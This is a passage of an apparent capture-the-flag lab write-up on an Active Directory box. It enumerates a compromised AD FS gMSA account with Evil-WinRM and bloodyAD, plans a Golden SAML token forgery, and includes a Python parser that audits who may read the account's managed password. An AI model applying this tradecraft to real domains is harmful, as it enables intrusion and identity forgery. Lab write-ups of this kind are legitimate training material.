adfs_gmsa$
Checking the privileges of the adfs_gmsa$ account after the lateral movement
*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
================ =============================================
ghost\adfs_gmsa$ S-1-5-21-4084500788-938703357-3654145966-4101
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
GHOST\Domain Computers Group S-1-5-21-4084500788-938703357-3654145966-515 Mandatory group, Enabled by default, Enabled group
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
The adfs_gmsa$ account doesn't have any notable privilege aside from SeMachineAccountPrivilege.
AD Federation
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ KRB5CCNAME=adfs_gmsa\$@dc01.ghost.htb.ccache bloodyAD -d GHOST.HTB -k --host dc01.ghost.htb get object 'adfs_gmsa$' | grep -v nTSecurityDescriptor:
distinguishedName: CN=adfs_gmsa,CN=Managed Service Accounts,DC=ghost,DC=htb
accountExpires: 9999-12-31 23:59:59.999999+00:00
badPasswordTime: 1601-01-01 00:00:00+00:00
cn: adfs_gmsa
dNSHostName: federation.ghost.htb
dSCorePropagationData: 1601-01-01 00:00:00+00:00
instanceType: 4
lastLogoff: 1601-01-01 00:00:00+00:00
lastLogon: 2024-07-18 13:50:07.440161+00:00
lastLogonTimestamp: 2024-07-18 13:48:56.493662+00:00
logonCount: 41
memberOf: CN=Remote Management Users,CN=Builtin,DC=ghost,DC=htb
msDS-GroupMSAMembership: AQAEgGQAAAAAAAAAAAAAABQAAAAEAFAAAgAAAAAAJAD/AQ8AAQUAAAAAAAUVAAAANIl08/158zeu183Z6AMAAAAAJAD/AQ8AAQUAAAAAAAUVAAAANIl08/158zeu183ZFw4AAAECAAAAAAAFIAAAACACAAA=
msDS-ManagedPasswordId: AQAAAEtEU0sCAAAAagEAABEAAAAAAAAAH33uQ1GTzzYRS2XM5QP0SwAAAAAUAAAAFAAAAGcAaABvAHMAdAAuAGgAdABiAAAAZwBoAG8AcwB0AC4AaAB0AGIAAAA=
msDS-ManagedPasswordInterval: 30
msDS-ManagedPasswordPreviousId: AQAAAEtEU0sCAAAAagEAAA4AAAAYAAAAH33uQ1GTzzYRS2XM5QP0SwAAAAAUAAAAFAAAAGcAaABvAHMAdAAuAGgAdABiAAAAZwBoAG8AcwB0AC4AaAB0AGIAAAA=
msDS-SupportedEncryptionTypes: 28
name: adfs_gmsa
objectCategory: CN=ms-DS-Group-Managed-Service-Account,CN=Schema,CN=Configuration,DC=ghost,DC=htb
objectClass: top; person; organizationalPerson; user; computer; msDS-GroupManagedServiceAccount
objectGUID: {14385003-dbb5-4a46-8a87-555081d0de92}
objectSid: S-1-5-21-4084500788-938703357-3654145966-4101
primaryGroupID: 515
pwdLastSet: 2024-07-02 14:39:04.978779+00:00
sAMAccountName: adfs_gmsa$
sAMAccountType: 805306369
servicePrincipalName: host/federation.ghost.htb
uSNChanged: 147546
uSNCreated: 30281
userAccountControl: WORKSTATION_TRUST_ACCOUNT
whenChanged: 2024-07-18 13:48:56+00:00
whenCreated: 2024-02-03 01:29:14+00:00
The adfs_gmsa$ account is a Group Managed Service Account (gMSA) with its SPN set to host/federation.ghost.htb.
This indicates that the account is most likely the service account of Active Directory Federation Services (AD FS) on that host.
Therefore, it would be possible to extract both the DKM key and the Token Signing key in order to forge a SAML token, i.e. a Golden SAML attack.
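As an added example (not part of the original writeup), the following parser decodes the msDS-GroupMSAMembership value listed above. That attribute is a self-relative security descriptor whose DACL names the principals allowed to retrieve the gMSA's managed password, which is exactly the list a defender should audit, because every principal on it can act as adfs_gmsa$ and therefore as the AD FS service. The decoded SIDs are not resolved to account names here; that would need an LDAP lookup.

```python
import base64
import struct

# Input taken from the bloodyAD output above (msDS-GroupMSAMembership of adfs_gmsa$).
GMSA_MEMBERSHIP_B64 = (
    "AQAEgGQAAAAAAAAAAAAAABQAAAAEAFAAAgAAAAAAJAD/AQ8AAQUAAAAAAAUVAAAANIl08/158zeu183Z"
    "6AMAAAAAJAD/AQ8AAQUAAAAAAAUVAAAANIl08/158zeu183ZFw4AAAECAAAAAAAFIAAAACACAAA="
)

def sid_to_str(buf, off):
    """Decode a binary SID at buf[off:]; return (string form, byte length)."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")   # 48-bit big-endian
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)   # little-endian sub-authorities
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs)), 8 + 4 * count

def parse_gmsa_membership(b64):
    """Return (owner_sid, [(kind, access_mask, trustee_sid), ...]) from the
    self-relative SECURITY_DESCRIPTOR stored in msDS-GroupMSAMembership."""
    sd = base64.b64decode(b64)
    rev, _, control, off_owner, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not control & 0x0004:                      # SE_DACL_PRESENT
        raise ValueError("unexpected descriptor revision or no DACL present")
    owner, _ = sid_to_str(sd, off_owner)
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)  # ACL header
    aces, pos = [], off_dacl + 8
    for _ in range(ace_count):
        ace_type, _ace_flags, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_type in (0, 1):                                # ACCESS_ALLOWED / ACCESS_DENIED
            (mask,) = struct.unpack_from("<I", sd, pos + 4)
            trustee, _ = sid_to_str(sd, pos + 8)
            aces.append(("ALLOW" if ace_type == 0 else "DENY", mask, trustee))
        pos += ace_size                                       # object ACEs etc. are skipped
    return owner, aces

def principals_allowed_to_retrieve(b64):
    """SIDs holding an ACCESS_ALLOWED ACE, i.e. who may read the managed password."""
    _, aces = parse_gmsa_membership(b64)
    return [sid for kind, _, sid in aces if kind == "ALLOW"]

if __name__ == "__main__":
    owner, aces = parse_gmsa_membership(GMSA_MEMBERSHIP_B64)
    print("owner:", owner)                                    # BUILTIN\Administrators
    for kind, mask, sid in aces:
        print("%-5s mask=0x%08X %s" % (kind, mask, sid))      # 0x000F01FF = full control
```

Both trustees are domain-local RIDs (1000 and 3607) of the GHOST domain SID seen in the whoami output; resolving them to sAMAccountNames tells you which computer or user accounts can obtain the AD FS service account's password.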
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ KRB5CCNAME=adfs_gmsa\$@dc01.ghost.htb.ccache bloodyAD -d GHOST.HTB -k --host dc01.ghost.htb get writable
distinguishedName: CN=CryptoPolicy,CN=5ef3db40-8c5c-4534-8ed7-b8ff12541e81,CN=ADFS,CN=Microsoft,CN=Program Data,DC=ghost,DC=htb
permission: CREATE_CHILD; WRITE
OWNER: WRITE
distinguishedName: CN=9c73b27d-de3f-4c85-93a8-d38a875dd04b,CN=5ef3db40-8c5c-4534-8ed7-b8ff12541e81,CN=ADFS,CN=Microsoft,CN=Program Data,DC=ghost,DC=htb
permission: CREATE_CHILD; WRITE
OWNER: WRITE
distinguishedName: CN=5ef3db40-8c5c-4534-8ed7-b8ff12541e81,CN=ADFS,CN=Microsoft,CN=Program Data,DC=ghost,DC=htb
permission: CREATE_CHILD; WRITE
OWNER: WRITE
distinguishedName: CN=CryptoPolicy,CN=f8cadcbe-917c-4929-afe0-6ad20854a7d0,CN=ADFS,CN=Microsoft,CN=Program Data,DC=ghost,DC=htb
permission: CREATE_CHILD; WRITE
OWNER: WRITE
distinguishedName: CN=3cc19098-c626-4d0c-895c-95f656800985,CN=f8cadcbe-917c-4929-afe0-6ad20854a7d0,CN=ADFS,CN=Microsoft,CN=Program Data,DC=ghost,DC=htb
permission: CREATE_CHILD; WRITE
OWNER: WRITE
distinguishedName: CN=f8cadcbe-917c-4929-afe0-6ad20854a7d0,CN=ADFS,CN=Microsoft,CN=Program Data,DC=ghost,DC=htb
permission: CREATE_CHILD; WRITE
OWNER: WRITE
distinguishedName: CN=adfs_gmsa,CN=Managed Service Accounts,DC=ghost,DC=htb
permission: WRITE
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=ghost,DC=htb
permission: WRITE
distinguishedName: CN=TPM Devices,DC=ghost,DC=htb
permission: CREATE_CHILD